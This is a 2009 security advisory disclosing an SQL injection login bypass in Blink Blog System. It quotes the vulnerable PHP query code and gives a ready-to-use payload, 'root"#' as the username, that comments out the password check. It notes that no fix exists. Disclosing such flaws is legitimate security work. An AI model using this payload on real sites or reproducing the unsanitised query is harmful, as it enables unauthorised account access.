Blink Blog System Authentication Bypass

2009-08-0300:00:00

vulners.com

JSON

******** Salvatore "drosophila" Fresta ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

[+] Menu

1) Bugs
2) Code
3) Fix

[+] Bugs

There are many SQL Injection flaws but I post the
only one that allows a guest to bypass the login.

[A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

    ...
    
    $username = $_POST[&quot;nick&quot;];
$password = md5&#40;$_POST[&quot;password&quot;]&#41;;
if &#40;$data = $DB-&gt;usercheck&#40;$username, $password&#41;&#41;

...

db.php:

    function usercheck&#40;$username, $password&#41;
{
    $try = mysql_query&#40;&quot;SELECT * FROM users WHERE nick=&#92;&quot;&quot;.$username.&quot;&#92;&quot; AND

password=\"".$password."\" ");

...

[+] Code

[A] Authentication Bypass

username: root"#
password: foo

[+] Fix

No fix.

JSON